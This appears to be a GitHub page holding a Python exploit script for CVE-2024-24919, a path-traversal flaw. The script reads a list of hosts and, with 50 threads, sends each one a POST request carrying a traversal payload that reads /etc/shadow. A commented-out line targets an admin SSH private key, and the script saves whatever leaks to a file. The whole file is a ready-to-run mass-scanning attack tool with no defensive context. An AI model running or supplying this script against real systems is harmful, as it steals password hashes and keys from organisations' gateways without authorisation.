-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathCVE-2024-24919.py
60 lines (51 loc) · 2.25 KB
/
CVE-2024-24919.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
import requests
import sys
import urllib3
from concurrent.futures import ThreadPoolExecutor, as_completed
from datetime import datetime
from tqdm import tqdm
# Suppress only the single InsecureRequestWarning from urllib3 needed for this use case
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def send_post_request(host, output_file):
url = f"https://{host}/clients/MyCRL"
headers = {
"Host": host,
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36"
}
# data = "aCSHELL/../../../../../../../home/admin/.ssh/id_rsa"
data = "aCSHELL/../../../../../../../etc/shadow"
try:
response = requests.post(url, headers=headers, data=data, verify=False, timeout=10)
if response.status_code == 200:
with open(output_file, 'a') as f:
f.write(f"Host: {host}\n")
f.write(response.text)
f.write("\n\n")
return True
else:
return False
except requests.RequestException:
return False
def main(file_path, output_file):
start_time = datetime.now()
try:
with open(file_path, 'r') as file:
hosts = [host.strip() for host in file.readlines() if host.strip()]
with open(output_file, 'a') as f:
f.write(f"Start time: {start_time}\n\n")
with ThreadPoolExecutor(max_workers=50) as executor: # Adjust the number of max_workers as needed
futures = {executor.submit(send_post_request, host, output_file): host for host in hosts}
for future in tqdm(as_completed(futures), total=len(futures), desc="Processing"):
success = future.result()
finish_time = datetime.now()
with open(output_file, 'a') as f:
f.write(f"\nFinish time: {finish_time}\n")
except FileNotFoundError:
print(f"The file {file_path} does not exist.")
if __name__ == "__main__":
if len(sys.argv) != 3:
print("Usage: python CVE-2024-24919.py IP.txt output.txt")
else:
main(sys.argv[1], sys.argv[2])